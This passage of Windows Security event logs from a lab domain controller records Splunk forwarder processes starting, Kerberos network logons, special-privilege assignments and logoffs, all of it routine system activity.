Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264279
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x91c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264280
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E4A85
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53518
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264281
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264283
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1584
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264282
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264285
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E5DEF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62478
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264284
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E5DEF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:01:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264286
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x7E4A85
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264287
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E5DEF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264290
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E6B9D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264289
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E6B9D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62487
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:01:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264288
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E6B9D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264292
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264291
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264293
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264294
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x196c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264295
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcb0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264297
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x181c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264296
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1300
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264303
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E99E8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264302
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E99E8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62494
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264301
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E99E8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264300
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E997C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264299
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E997C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62493
Detailed Authentication Information:
Logon Process: Kerberos
